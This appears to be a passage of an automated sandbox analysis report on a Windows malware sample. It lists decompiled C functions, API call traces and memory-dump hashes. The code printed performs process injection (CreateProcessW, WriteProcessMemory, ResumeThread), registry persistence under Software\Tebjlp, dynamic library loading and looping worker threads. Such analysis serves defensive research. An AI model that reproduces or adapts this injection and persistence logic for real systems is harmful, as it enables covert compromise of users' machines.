                                0x02204f3f
                                0x0220508c
                                0x02205095
                                0x0220509e
                                0x022050a5
                                0x022050ac
                                0x022050b5
                                0x022050cd
                                0x022050e2
                                0x022050e8
                                0x022050ed
                                0x022050f0
                                0x022050f7
                                0x02205100
                                0x02205100
                                0x02205106
                                0x02204ed4
                                0x02204ed4
                                0x02204ed4
                                0x02204ed2
                                0x00000000
                                0x02204e3c
                                0x02205459
                                0x0220545c
                                0x02205469

                                APIs
                                • lstrcpy.KERNEL32(00000000,Software\Tebjlp), ref: 02204E54
                                • lstrlen.KERNEL32(00000000,\%d,6F666C61), ref: 02204E78
                                • wsprintfA.USER32 ref: 02204E86
                                • RegOpenKeyExA.KERNELBASE(80000001,?,00000000,000F003F,?), ref: 02204EA9
                                • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 02204ECA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: CreateOpenlstrcpylstrlenwsprintf
                                • String ID: Software\Tebjlp$\%d$alfoC:\Windows\
                                • API String ID: 4004410694-2477328435
                                • Opcode ID: e2cbd616f486fcc6a09469fbbcb350e1068f88e0d15d9019fecbec6feaa9e0e9
                                • Instruction ID: 33a0e5682ef00ce2c1e402821c12ed7a9f5440108e9db5c3752d1137468a6fcf
                                • Opcode Fuzzy Hash: e2cbd616f486fcc6a09469fbbcb350e1068f88e0d15d9019fecbec6feaa9e0e9
                                • Instruction Fuzzy Hash: AC0290B1911218DBDB20DF90CC84FEAB7B9BB58304F0886D9E51967285DBB29BD4CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 92%
                                			E00401000(void* _a4, long _a8, void* _a12) {
                                				struct _PROCESS_INFORMATION _v20;
                                				long _v24;
                                				struct _STARTUPINFOW _v92;
                                				long _v104;
                                				long _v114;
                                				long _v122;
                                				long _v130;
                                				short _v132;
                                				long _v138;
                                				long _v144;
                                				long _v2192;
                                				short _v2712;
                                				intOrPtr _v2716;
                                				intOrPtr _v2720;
                                				intOrPtr _v2724;
                                				intOrPtr _v2728;
                                				intOrPtr _v2732;
                                				intOrPtr _v2736;
                                				intOrPtr _v2740;
                                				intOrPtr _v2744;
                                				intOrPtr _v2748;
                                				intOrPtr _v2752;
                                				intOrPtr _v2756;
                                				intOrPtr _v2760;
                                				intOrPtr _v2764;
                                				intOrPtr _v2768;
                                				intOrPtr _v2772;
                                				char _v2776;
                                				intOrPtr _v2780;
                                				intOrPtr _v2784;
                                				intOrPtr _v2788;
                                				intOrPtr _v2792;
                                				intOrPtr _v2796;
                                				intOrPtr _v2800;
                                				intOrPtr _v2804;
                                				intOrPtr _v2808;
                                				intOrPtr _v2812;
                                				intOrPtr _v2816;
                                				intOrPtr _v2820;
                                				intOrPtr _v2824;
                                				intOrPtr _v2828;
                                				intOrPtr _v2832;
                                				intOrPtr _v2836;
                                				void _v2840;
                                				void _v3334;
                                				short _v3360;
                                				int _t75;
                                				int _t80;
                                				void* _t124;
                                				void* _t129;
                                				void* _t142;
                                				signed int _t146;
                                				long _t155;
                                				long _t168;
                                
                                				_t155 = 0x44;
                                				_v92.cb = _t155;
                                				_t146 = 0x10;
                                				memset( &(_v92.lpReserved), 0, _t146 << 2);
                                				_push(6);
                                				_t75 = memcpy( &_v3360, 0x403048, 0 << 2);
                                				asm("movsw");
                                				_push(0x7b);
                                				memset( &_v3334, _t75, 0 << 2);
                                				asm("stosw");
                                				_t80 = CreateProcessW(0,  &_v3360, 0, 0, 0, _t155, 0, 0,  &_v92,  &_v20); // executed
                                				if(_t80 == 0) {
                                					return 0;
                                				}
                                				_v2836 = WaitForSingleObject;
                                				_v2828 = DeleteFileW;
                                				_v2824 = Sleep;
                                				_v2820 = ExitProcess;
                                				_v2816 = MessageBoxA;
                                				_v2812 = sprintf;
                                				_v2808 = GetTempPathW;
                                				_v2804 = GetTempFileNameW;
                                				_v2800 = __imp___wfopen;
                                				_v2796 = fseek;
                                				_v2792 = fwrite;
                                				_v2788 = fread;
                                				_v2784 = fclose;
                                				_v2780 = malloc;
                                				_v2768 = SetErrorMode;
                                				_v2760 = wcscat;
                                				_v2752 = CreateFileW;
                                				_v2748 = GetFileTime;
                                				_v2744 = GetDriveTypeW;
                                				_v2740 = wcsrchr;
                                				_v2736 = CopyFileW;
                                				_v2732 = __imp___chsize;
                                				_v2728 = _fileno;
                                				_v2724 = fflush;
                                				_v2720 = ShellExecuteW;
                                				_v2716 = SetFileTime;
                                				_v2772 = CreateProcessW;
                                				_v2832 = CloseHandle;
                                				_v2776 = "Pp_v01bv";
                                				_v2764 = 0x401644;
                                				_v2756 = wcscpy;
                                				wcscpy( &_v2192, _a4);
                                				wcscpy( &_v138, 0x403040);
                                				wcscpy( &_v144, 0x403038);
                                				wcscpy( &_v130, 0x403030);
                                				wcscpy( &_v122, 0x403028);
                                				wcscpy( &_v114, 0x40301c);
                                				wcscpy( &_v104, 0x403010);
                                				_v132 = 0x5c;
                                				_t124 = GetCurrentProcess();
                                				DuplicateHandle(GetCurrentProcess(), _t124, _v20.hProcess,  &_v2840, 0, 0, 0); // executed
                                				GetModuleFileNameW(0,  &_v2712, 0x104);
                                				_t129 = E00401346(_v20.hProcess, _v20.hThread); // executed
                                				_t168 = _a8;
                                				_a4 = _t129;
                                				E004012D3( &_a12, _t129,  &_a12, _t168); // executed
                                				_t60 = _t168 + 0xaba; // 0xaba
                                				VirtualProtectEx(_v20.hProcess, _a4, _t60, 0x40,  &_v24);
                                				WriteProcessMemory(_v20.hProcess, _a4, _a12, _t168, 0);
                                				WriteProcessMemory(_v20.hProcess, _a4 + _t168,  &_v2840, 0xaba, 0);
                                				ResumeThread(_v20.hThread);
                                				CloseHandle(_v20.hThread);
                                				CloseHandle(_v20);
                                				free(_a12);
                                				_t142 = 1;
                                				return _t142;
                                			}

























































                                0x0040100f
                                0x00401015
                                0x00401018
                                0x0040101e
                                0x00401020
                                0x00401029
                                0x0040102b
                                0x0040102d
                                0x0040103c
                                0x0040103e
                                0x00401058
                                0x0040105c
                                0x00000000
                                0x004012cd
                                0x0040106d
                                0x00401078
                                0x00401083
                                0x0040108e
                                0x00401099
                                0x004010a4
                                0x004010af
                                0x004010ba
                                0x004010c5
                                0x004010d0
                                0x004010db
                                0x004010e6
                                0x004010f1
                                0x004010fc
                                0x00401107
                                0x00401112
                                0x0040111d
                                0x00401128
                                0x00401133
                                0x0040113e
                                0x00401149
                                0x00401154
                                0x0040115f
                                0x0040116a
                                0x00401175
                                0x0040118a
                                0x00401190
                                0x004011a2
                                0x004011a9
                                0x004011af
                                0x004011b9
                                0x004011bf
                                0x004011cd
                                0x004011db
                                0x004011e6
                                0x004011f1
                                0x004011fc
                                0x00401207
                                0x00401214
                                0x00401227
                                0x0040122d
                                0x00401241
                                0x0040124d
                                0x00401252
                                0x0040125b
                                0x0040125e
                                0x0040126a
                                0x00401279
                                0x0040128b
                                0x004012a8
                                0x004012b1
                                0x004012ba
                                0x004012bf
                                0x004012c4
                                0x004012c9
                                0x00000000

                                APIs
                                • CreateProcessW.KERNELBASE ref: 00401058
                                • wcscpy.MSVCRT ref: 004011BF
                                • wcscpy.MSVCRT ref: 004011CD
                                • wcscpy.MSVCRT ref: 004011DB
                                • wcscpy.MSVCRT ref: 004011E6
                                • wcscpy.MSVCRT ref: 004011F1
                                • wcscpy.MSVCRT ref: 004011FC
                                • wcscpy.MSVCRT ref: 00401207
                                • GetCurrentProcess.KERNEL32(004017DA,?,00000000,00000000,00000000), ref: 00401227
                                • GetCurrentProcess.KERNEL32(00000000), ref: 0040122A
                                • DuplicateHandle.KERNELBASE(00000000), ref: 0040122D
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401241
                                  • Part of subcall function 00401346: GetThreadContext.KERNELBASE(00401252,?,766DF560,766DF500,765F7050), ref: 00401366
                                  • Part of subcall function 00401346: GetThreadSelectorEntry.KERNEL32 ref: 00401379
                                  • Part of subcall function 00401346: ReadProcessMemory.KERNELBASE(004017DA,00401252,?,00000B2C,00000000), ref: 004013B5
                                  • Part of subcall function 00401346: ReadProcessMemory.KERNELBASE(004017DA,?,?,000001D8,00000000), ref: 004013CE
                                  • Part of subcall function 00401346: ReadProcessMemory.KERNELBASE(004017DA,?,004017DA,?,00000000), ref: 004013E5
                                  • Part of subcall function 00401346: ReadProcessMemory.KERNELBASE(004017DA,59000000,?,00000018,00000000), ref: 004013FA
                                • VirtualProtectEx.KERNEL32(004017DA,?,00000ABA,00000040,?), ref: 00401279
                                • WriteProcessMemory.KERNEL32(004017DA,?,004017DA,00000000,00000000), ref: 0040128B
                                • WriteProcessMemory.KERNEL32(004017DA,?,?,00000ABA,00000000), ref: 004012A8
                                • ResumeThread.KERNEL32(00000000), ref: 004012B1
                                • CloseHandle.KERNEL32(00000000), ref: 004012BA
                                • CloseHandle.KERNEL32(004017DA), ref: 004012BF
                                • free.MSVCRT(004017DA), ref: 004012C4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.314281545.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.314272065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314297689.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314331044.0000000000425000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314403919.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314484210.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314601354.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Similarity
                                • API ID: Process$wcscpy$Memory$Read$HandleThread$CloseCurrentWrite$ContextCreateDuplicateEntryFileModuleNameProtectResumeSelectorVirtualfree
                                • String ID: H0@$\
                                • API String ID: 2728588581-3173346701
                                • Opcode ID: ac48f256abe60f638106692655660bf668ea59fe7fa0b28b22a79a51fcc009a3
                                • Instruction ID: 8b8ae813a4a7e84dff6f5983beaa3dde5466e697ef8a21ee926d92c0f9824885
                                • Opcode Fuzzy Hash: ac48f256abe60f638106692655660bf668ea59fe7fa0b28b22a79a51fcc009a3
                                • Instruction Fuzzy Hash: A581A8B5A00319AFDB50DFA4DE44F9A7BF8FB09314F1044A6AA09F3290D7B4AA44CF55
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 84%
                                			E0221392D() {
                                				void _v4099;
                                				char _v4100;
                                				void _v4104;
                                				struct HINSTANCE__* _v4108;
                                				long _v4112;
                                				intOrPtr _t31;
                                				struct HINSTANCE__* _t33;
                                				intOrPtr _t48;
                                				CHAR* _t51;
                                				CHAR* _t53;
                                				_Unknown_base(*)()* _t54;
                                				void* _t55;
                                				void* _t70;
                                				void* _t71;
                                				void* _t73;
                                				void* _t75;
                                
                                				E02218060(0x100c, _t55);
                                				_v4112 = 0;
                                				_v4104 = 0;
                                				_v4100 = 0;
                                				memset( &_v4099, 0, 0x3ff << 2);
                                				_t71 = _t70 + 0xc;
                                				asm("stosw");
                                				asm("stosb");
                                				L1:
                                				if( *0x22883dc == 0) {
                                					Sleep(0x1000);
                                					goto L1;
                                				}
                                				_t31 =  *0x21e180c; // 0x2202714
                                				_t58 =  &_v4100;
                                				 *0x21e1148( &_v4100, _t31);
                                				 *0x2219000 = 0;
                                				_t33 = LoadLibraryA( &_v4100); // executed
                                				_v4108 = _t33;
                                				__eflags = _v4108;
                                				if(_v4108 != 0) {
                                					_t53 =  *0x21e1808; // 0x2202700
                                					_t58 = _v4108;
                                					_t54 = GetProcAddress(_v4108, _t53); // executed
                                					 *0x2219000 = _t54;
                                				}
                                				__eflags =  *0x2219000;
                                				if(__eflags == 0) {
                                					FreeLibrary(_v4108);
                                					_t48 =  *0x21e16c4; // 0x22022b0
                                					_t58 =  &_v4100;
                                					 *0x21e106c( &_v4100, _t48);
                                					_v4108 = LoadLibraryA( &_v4100);
                                					__eflags = _v4108;
                                					if(__eflags != 0) {
                                						_t51 =  *0x21e1808; // 0x2202700
                                						_t58 = _v4108;
                                						 *0x2219000 = GetProcAddress(_v4108, _t51); // executed
                                					}
                                				}
                                				E0221377A(_t58, __eflags); // executed
                                				E022041C6(_t58, CreateThread(0, 0, E02213062, 0, 0,  &_v4112), 0, 0);
                                				E022041C6(_t58, CreateThread(0, 0, E02211E9B, 0, 0,  &_v4112), 0, 0);
                                				_t73 = _t71 + 0x18;
                                				Sleep(0x400);
                                				_v4104 = 0x42;
                                				while(1) {
                                					__eflags = _v4104 - 0x5a;
                                					if(_v4104 >= 0x5a) {
                                						break;
                                					}
                                					E022041C6(_t58, CreateThread(0, 0, E02211CE3,  &_v4104, 0,  &_v4112), 0, 0);
                                					_t73 = _t73 + 0xc;
                                					_t58 = _v4104 + 1;
                                					__eflags = _t58;
                                					_v4104 = _t58;
                                					Sleep(0x400);
                                				}
                                				Sleep(0x400);
                                				E0221174A(0x80000001);
                                				E0221174A(0x80000002);
                                				_t75 = _t73 + 8;
                                				L14:
                                				__eflags =  *0x22190c4;
                                				if( *0x22190c4 != 0) {
                                					__eflags =  *0x22190bc;
                                					if( *0x22190bc != 0) {
                                						__eflags =  *0x2219014;
                                						if( *0x2219014 != 0) {
                                							E02204060( &_v4100, 0, 0x1000);
                                							E0221195D(0x2219078,  &_v4100);
                                							_t75 = _t75 + 0x14;
                                						}
                                					}
                                				}
                                				Sleep(0xdbba0);
                                				goto L14;
                                			}



















                                0x02213935
                                0x0221393b
                                0x02213945
                                0x0221394f
                                0x02213963
                                0x02213963
                                0x02213965
                                0x02213967
                                0x02213968
                                0x0221396f
                                0x02213976
                                0x00000000
                                0x02213976
                                0x0221397e
                                0x02213984
                                0x0221398b
                                0x02213991
                                0x022139a2
                                0x022139a8
                                0x022139ae
                                0x022139b5
                                0x022139b7
                                0x022139bd
                                0x022139c4
                                0x022139ca
                                0x022139ca
                                0x022139cf
                                0x022139d6
                                0x022139df
                                0x022139e5
                                0x022139eb
                                0x022139f2
                                0x02213a05
                                0x02213a0b
                                0x02213a12
                                0x02213a14
                                0x02213a1a
                                0x02213a27
                                0x02213a27
                                0x02213a12
                                0x02213a2c
                                0x02213a50
                                0x02213a77
                                0x02213a7c
                                0x02213a84
                                0x02213a8a
                                0x02213ab0
                                0x02213ab0
                                0x02213ab7
                                0x00000000
                                0x00000000
                                0x02213add
                                0x02213ae2
                                0x02213a9c
                                0x02213a9c
                                0x02213a9f
                                0x02213aaa
                                0x02213aaa
                                0x02213aec
                                0x02213af7
                                0x02213b04
                                0x02213b09
                                0x02213b19
                                0x02213b19
                                0x02213b20
                                0x02213b22
                                0x02213b29
                                0x02213b2b
                                0x02213b32
                                0x02213b42
                                0x02213b56
                                0x02213b5b
                                0x02213b5b
                                0x02213b32
                                0x02213b29
                                0x02213b13
                                0x00000000

                                APIs
                                • Sleep.KERNEL32(00001000), ref: 02213976
                                • lstrcpy.KERNEL32(00000000,02202714), ref: 0221398B
                                • LoadLibraryA.KERNELBASE(00000000), ref: 022139A2
                                • GetProcAddress.KERNELBASE(00000000,02202700), ref: 022139C4
                                • FreeLibrary.KERNEL32(00000000), ref: 022139DF
                                • lstrcat.KERNEL32(00000000,022022B0), ref: 022139F2
                                • LoadLibraryA.KERNEL32(00000000), ref: 022139FF
                                • GetProcAddress.KERNEL32(00000000,02202700), ref: 02213A21
                                • CreateThread.KERNEL32(00000000,00000000,02213062,00000000,00000000,00000000), ref: 02213A49
                                • CreateThread.KERNEL32(00000000,00000000,02211E9B,00000000,00000000,?), ref: 02213A70
                                • Sleep.KERNEL32(00000400), ref: 02213A84
                                • Sleep.KERNEL32(00000400), ref: 02213AAA
                                • CreateThread.KERNEL32(00000000,00000000,02211CE3,0000005A,00000000,?), ref: 02213AD6
                                • Sleep.KERNEL32(00000400), ref: 02213AEC
                                • Sleep.KERNEL32(000DBBA0), ref: 02213B13
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: Sleep$CreateLibraryThread$AddressLoadProc$Freelstrcatlstrcpy
                                • String ID: Z
                                • API String ID: 4104366077-1505515367
                                • Opcode ID: 71cd58ff3a0939d6ad92275d5113f74bb51b62f1bb938d5492dc814b1dd4435e
                                • Instruction ID: c9d8ef9025450b6006062bdd4e8e2b888f5c773d1bf441ef1b7b255b9320b451
                                • Opcode Fuzzy Hash: 71cd58ff3a0939d6ad92275d5113f74bb51b62f1bb938d5492dc814b1dd4435e
                                • Instruction Fuzzy Hash: 37517C75D90244EBEB21EBE0EC09FDA77B5AB18702F008994E249AA184D7F05AD4CF61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 28%
                                			E02204AF0(void* __ecx, void* __eflags, char _a4) {
                                				void _v267;
                                				char _v268;
                                				void _v4363;
                                				char _v4364;
                                				int _v4368;
                                				signed int _v4372;
                                				void* _v4376;
                                				char _v4380;
                                				signed int _v4384;
                                				void* _t68;
                                				long _t75;
                                				long _t76;
                                				signed int _t83;
                                				long _t87;
                                				signed int _t96;
                                				signed int _t105;
                                				void* _t118;
                                				void* _t119;
                                				void* _t121;
                                				void* _t122;
                                
                                				E02218060(0x111c, __ecx);
                                				_v268 = 0;
                                				memset( &_v267, 0, 0x41 << 2);
                                				_v4364 = 0;
                                				_t68 = memset( &_v4363, 0, 0x3ff << 2);
                                				_t121 = _t119 + 0x18;
                                				asm("stosw");
                                				asm("stosb");
                                				_v4372 = 0x80;
                                				_v4380 = 0;
                                				_v4368 = 0;
                                				_v4376 = 0;
                                				if(_a4 != 0) {
                                					 *0x21e1148( &_v268, "Software\\Tebjlp");
                                					_t105 = "alfoC:\\Windows\\"; // 0x6f666c61
                                					wsprintfA(_t118 +  *0x21e114c( &_v268, "\%d", _t105 * 0) - 0x108);
                                					_t122 = _t121 + 0xc;
                                					_t75 = RegOpenKeyExA(0x80000001,  &_v268, 0, 0xf003f,  &_v4376); // executed
                                					__eflags = _t75;
                                					if(_t75 == 0) {
                                						L5:
                                						_v4372 = 1;
                                						while(1) {
                                							__eflags = _v4372 - 8;
                                							if(_v4372 >= 8) {
                                								break;
                                							}
                                							_t96 = "alfoC:\\Windows\\"; // 0x6f666c61
                                							wsprintfA( &_v268, 0x2203c48, _t96 * _v4372);
                                							_t122 = _t122 + 0xc;
                                							_v4384 = _v4372;
                                							_v4384 = _v4384 - 1;
                                							__eflags = _v4384 - 6;
                                							if(__eflags > 0) {
                                								L17:
                                								__eflags = _v4372 - 5;
                                								if(_v4372 > 5) {
                                									RegSetValueExA(_v4376,  &_v268, 0, 1,  &_v4364,  *0x21e114c( &_v4364)); // executed
                                								} else {
                                									RegSetValueExA(_v4376,  &_v268, 0, "true",  &_v4380, "true"); // executed
                                								}
                                								_t83 = _v4372 + 1;
                                								__eflags = _t83;
                                								_v4372 = _t83;
                                								continue;
                                							}
                                							switch( *((intOrPtr*)(_v4384 * 4 +  &M02204D7A))) {
                                								case 0:
                                									_v4380 =  *_a4;
                                									goto L17;
                                								case 1:
                                									__edx = _a4;
                                									__eax = 0;
                                									_v4380 = 0;
                                									goto L17;
                                								case 2:
                                									__ecx = _a4;
                                									__edx = 0;
                                									_v4380 = 0;
                                									goto L17;
                                								case 3:
                                									__eax = _a4;
                                									__ecx = 0;
                                									_v4380 = 0;
                                									goto L17;
                                								case 4:
                                									__edx = _a4;
                                									__eax =  *(__edx + 8);
                                									_v4380 =  *(__edx + 8);
                                									goto L17;
                                								case 5:
                                									__ecx = _a4;
                                									 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(__ecx + 8)) - 1;
                                									_push( *((intOrPtr*)(__ecx + 8)) - 1);
                                									_a4 = _a4 + 0xc;
                                									_push(_a4 + 0xc);
                                									__eax = E02204A5B(__ecx, __eflags);
                                									__esp = __esp + 8;
                                									_push(__eax);
                                									__ecx =  &_v4364;
                                									_push(__ecx);
                                									__eax =  *0x21e1148();
                                									goto L17;
                                								case 6:
                                									_push(0x100);
                                									__edx = _a4;
                                									__edx = _a4 + 0x40c;
                                									__eflags = __edx;
                                									_push(__edx);
                                									__eax = E02204A5B(__ecx, __edx);
                                									__esp = __esp + 8;
                                									_push(__eax);
                                									__eax =  &_v4364;
                                									_push( &_v4364);
                                									__eax =  *0x21e1148();
                                									goto L17;
                                							}
                                						}
                                						_t76 = RegCloseKey(_v4376); // executed
                                						return _t76;
                                					}
                                					_t87 = RegCreateKeyA(0x80000001,  &_v268,  &_v4376);
                                					__eflags = _t87;
                                					if(_t87 == 0) {
                                						goto L5;
                                					}
                                					return _t87;
                                				}
                                				return _t68;
                                			}























                                0x02204af8
                                0x02204afe
                                0x02204b12
                                0x02204b14
                                0x02204b28
                                0x02204b28
                                0x02204b2a
                                0x02204b2c
                                0x02204b2d
                                0x02204b37
                                0x02204b41
                                0x02204b4b
                                0x02204b59
                                0x02204b6c
                                0x02204b7a
                                0x02204b9e
                                0x02204ba4
                                0x02204bc1
                                0x02204bc7
                                0x02204bc9
                                0x02204bed
                                0x02204bed
                                0x02204c08
                                0x02204c08
                                0x02204c0f
                                0x00000000
                                0x00000000
                                0x02204c15
                                0x02204c2f
                                0x02204c35
                                0x02204c3e
                                0x02204c4d
                                0x02204c53
                                0x02204c5a
                                0x02204d0a
                                0x02204d0a
                                0x02204d11
                                0x02204d5d
                                0x02204d13
                                0x02204d2e
                                0x02204d2e
                                0x02204bff
                                0x02204bff
                                0x02204c02
                                0x00000000
                                0x02204c02
                                0x02204c66
                                0x00000000
                                0x02204c72
                                0x00000000
                                0x00000000
                                0x02204c7d
                                0x02204c80
                                0x02204c85
                                0x00000000
                                0x00000000
                                0x02204c8d
                                0x02204c90
                                0x02204c95
                                0x00000000
                                0x00000000
                                0x02204c9d
                                0x02204ca0
                                0x02204ca6
                                0x00000000
                                0x00000000
                                0x02204cae
                                0x02204cb1
                                0x02204cb4
                                0x00000000
                                0x00000000
                                0x02204cbc
                                0x02204cc2
                                0x02204cc5
                                0x02204cc9
                                0x02204ccc
                                0x02204ccd
                                0x02204cd2
                                0x02204cd5
                                0x02204cd6
                                0x02204cdc
                                0x02204cdd
                                0x00000000
                                0x00000000
                                0x02204ce5
                                0x02204cea
                                0x02204ced
                                0x02204ced
                                0x02204cf3
                                0x02204cf4
                                0x02204cf9
                                0x02204cfc
                                0x02204cfd
                                0x02204d03
                                0x02204d04
                                0x00000000
                                0x00000000
                                0x02204c66
                                0x02204d6f
                                0x00000000
                                0x02204d6f
                                0x02204bde
                                0x02204be4
                                0x02204be6
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02204be6
                                0x00000000

                                APIs
                                • lstrcpy.KERNEL32(00000000,Software\Tebjlp), ref: 02204B6C
                                • lstrlen.KERNEL32(00000000,\%d,6F666C61), ref: 02204B90
                                • wsprintfA.USER32 ref: 02204B9E
                                • RegOpenKeyExA.KERNELBASE(80000001,?,00000000,000F003F,?), ref: 02204BC1
                                • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 02204BDE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: CreateOpenlstrcpylstrlenwsprintf
                                • String ID: Software\Tebjlp$\%d$alfoC:\Windows\
                                • API String ID: 4004410694-2477328435
                                • Opcode ID: 0ebbb0b7fa6602344add6d820fa6095a86c48e7e1f422600a03a4f052cb93576
                                • Instruction ID: d88b30b868ac48a29b092ed07252fb0eb9a5fdcb6600f969629fb4d314a28ad0
                                • Opcode Fuzzy Hash: 0ebbb0b7fa6602344add6d820fa6095a86c48e7e1f422600a03a4f052cb93576
                                • Instruction Fuzzy Hash: AE619F74D54218EBDB28DF90DC95BDAB7B9EB58700F0085D8E309AA285D7B09AC0CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 73%
                                			E02206330(void* __ecx, void* __eflags, void* _a4, intOrPtr _a8) {
                                				void _v263;
                                				char _v264;
                                				signed int _v268;
                                				signed int _v272;
                                				char _v349;
                                				char _v350;
                                				void _v351;
                                				char _v352;
                                				signed int _v356;
                                				char _v612;
                                				signed int _v1635;
                                				signed int _v1636;
                                				char _v1640;
                                				void* _v1642;
                                				signed int _v1643;
                                				void _v1644;
                                				char _v1648;
                                				signed int _v1652;
                                				char _v5736;
                                				char _v5740;
                                				char _v5742;
                                				char _v5743;
                                				char _v5744;
                                				void _v5747;
                                				char _v5748;
                                				signed int _t159;
                                				void* _t163;
                                				signed int _t174;
                                				void* _t194;
                                				signed int _t218;
                                				void* _t243;
                                				void* _t248;
                                				void* _t260;
                                				signed int _t280;
                                				signed int _t284;
                                				void* _t302;
                                				void* _t311;
                                				void* _t346;
                                				void* _t375;
                                
                                				E02218060(0x1670, __ecx);
                                				_v264 = 0;
                                				memset( &_v263, 0, 0x40 << 2);
                                				asm("stosb");
                                				_v272 = 0;
                                				_v356 = 0;
                                				_v268 = 2;
                                				_v1652 = 0;
                                				_v352 = 0;
                                				memset( &_v351, 0, 0x13 << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v5748 = 0;
                                				memset( &_v5747, 0, 0x3ff << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v1648 = 0;
                                				memset( &_v1644, 0, 0x142 << 2);
                                				 *0x21e1174(0x2219050);
                                				if(_a8 != 0) {
                                					__eflags = _a8 - 1;
                                					if(_a8 != 1) {
                                						L48:
                                						 *0x21e1180(0x2219050);
                                						return _v1652;
                                					}
                                					_t159 = IsBadHugeWritePtr(_a4,  *_a4 + 8);
                                					__eflags = _t159;
                                					if(_t159 != 0) {
                                						goto L48;
                                					}
                                					__eflags =  *_a4 - 0x100000;
                                					if( *_a4 >= 0x100000) {
                                						goto L48;
                                					}
                                					__eflags =  *_a4 - 0x400;
                                					if( *_a4 <= 0x400) {
                                						goto L48;
                                					}
                                					_t163 = E02204145(_a4 + 8,  *_a4);
                                					_t243 = _a4;
                                					__eflags =  *((intOrPtr*)(_t243 + 4)) - _t163;
                                					if( *((intOrPtr*)(_t243 + 4)) != _t163) {
                                						goto L48;
                                					}
                                					wsprintfA( &_v5748, "purity_control_%x",  *_a4);
                                					E022042EC( &_v5748,  *0x21e114c( &_v264),  &_v5748);
                                					E022043C5(_a4 + 8,  *_a4,  &_v264);
                                					__eflags =  *((intOrPtr*)(_a4 + 0x108)) -  *0x22882b0; // 0x0
                                					if(__eflags <= 0) {
                                						goto L48;
                                					}
                                					__eflags =  *((intOrPtr*)(_a4 + 0x108)) -  *0x2287da0; // 0x54
                                					if(__eflags != 0) {
                                						goto L48;
                                					}
                                					_t248 = _a4;
                                					__eflags =  *((intOrPtr*)(_t248 + 0x10c)) - 0xa;
                                					if( *((intOrPtr*)(_t248 + 0x10c)) >= 0xa) {
                                						goto L48;
                                					}
                                					_t174 = E022047BB(_a4 + 0x108,  *_a4 - 0x100, _a4 + 8);
                                					__eflags = _t174;
                                					if(_t174 == 0) {
                                						goto L48;
                                					}
                                					 *0x22882b0 =  *((intOrPtr*)(_a4 + 0x108));
                                					__eflags =  *0x22882b4;
                                					if( *0x22882b4 != 0) {
                                						_t311 =  *0x22882b4; // 0x0
                                						GlobalFree(_t311);
                                					}
                                					 *0x22882b4 = GlobalAlloc(0x40,  *_a4 + 0x400);
                                					_t302 =  *0x22882b4; // 0x0
                                					E0221772B(_t302, _a4,  *_a4 + 8);
                                					__eflags =  *0x22882b8;
                                					if( *0x22882b8 != 0) {
                                						_t194 =  *0x22882b8; // 0x0
                                						GlobalFree(_t194);
                                					}
                                					 *0x22882b8 = GlobalAlloc(0x40,  *_a4 + 0x400);
                                					wsprintfA( &_v5748, "purity_control_%x",  *_a4);
                                					E022042EC( &_v5748,  *0x21e114c( &_v264),  &_v5748);
                                					E022043C5(_a4 + 8,  *_a4,  &_v264);
                                					__eflags =  *_a4 + 8;
